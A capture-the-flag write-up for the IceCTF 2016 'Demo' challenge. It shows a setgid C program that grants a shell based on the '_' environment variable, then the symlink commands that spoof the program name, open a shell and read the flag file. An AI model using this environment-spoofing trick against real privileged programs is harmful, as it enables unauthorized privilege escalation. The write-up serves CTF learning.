IceCTF 2016 Demo writeup [pwn] [55pts]

October 25, 2016

I did not see any writeup that use symlink to solve this, so I wrote one.

The code

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <libgen.h>
#include <string.h>
void give_shell() {
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}
int main(int argc, char *argv[]) {
    if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
        give_shell();
    }
    else {
        printf("I'm sorry, your free trial has ended.\n");
    }
    return 0;
}
[[email protected] ~]$ /home/demo/demo
I'm sorry, your free trial has ended.

Solution

[[email protected] ~]$ ln -s /home/demo/demo icesh
[[email protected] ~]$ ./icesh
$ cat /home/demo/flag.txt
IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

Yeah, just create a symlink because $_ in script or program will always return the executable name (correct me if I'm wrong)